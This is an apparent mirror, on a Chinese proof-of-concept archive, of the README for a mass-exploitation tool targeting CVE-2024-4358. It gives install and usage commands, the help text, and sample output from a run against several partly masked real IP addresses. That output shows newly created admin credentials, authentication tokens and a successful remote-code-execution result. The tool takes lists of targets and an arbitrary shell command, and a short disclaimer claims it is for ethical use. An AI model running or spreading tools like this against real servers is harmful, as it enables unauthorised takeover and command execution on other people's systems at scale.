关联漏洞
Description
An Vulnerability detection and Exploitation tool for CVE-2024-4358
介绍
# CVE-2024-4358
An Vulnerability detection and Mass Exploitation tool for CVE-2024-4358
### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```yaml
python3 exploit.py -h
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-4358
options:
-h, --help show this help message and exit
-u URL, --url URL [INF]: Specify a URL or IP wtih port for vulnerability detection
-l LIST, --list LIST [INF]: Specify a list of URLs or IPs for vulnerability detection
-c COMMAND, --command COMMAND
[INF]: Specify a shell command to execute it
-t THREADS, --threads THREADS
[INF]: Number of threads for list of URLs
-proxy PROXY, --proxy PROXY
[INF]: Proxy URL to send request via your proxy
-v, --verbose [INF]: Increases verbosity of output in console
-o OUTPUT, --output OUTPUT
[INF]: Filename to save output of vulnerable target]
```
### Sample Usage:
```yaml
python3 exploit.py -l urls.txt -c id -t 10
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Vulnerale]: Report for: http://13.42.129.XXX
Login Crendentials: Usename: ozsebbQpibJbHpghuNLxutxBOl | Password: NvmpjJucmxtqhOtdFtrxfoguvQ | Authentication Token: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
Deserialization RCE: Failed
[Vulnerale]: Report for: http://52.2.58.XX
Login Crendentials: Usename: pjzgrOrjJXqQyFoubmrcSkHZHC | Password: ZrGVXZqIrgWkuHCgUlkHIeYPG | Authentication Token: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
Deserialization RCE: Failed
[Vulnerale]: Report for: http://194.233.XXX.235:83
Login Crendentials: Usename: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Password: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Authentication Token: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
Report created: ELHaimYtblAxViEKIXxpdFyOXNlEHb
Deserialization RCE: Success
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s)
```
### INFO:
The tool is Developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and mass exploit the Vulnerability CVE-2024-4358,
The tool is only for education and ethical purpose only and Developers are not responsible for any illegal exploitations.
文件快照
[4.0K] /data/pocs/96b2b0f10803bd85e93d62925da7c04fca9bd352
├── [ 14K] exploit.py
├── [4.1K] README.md
└── [ 107] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。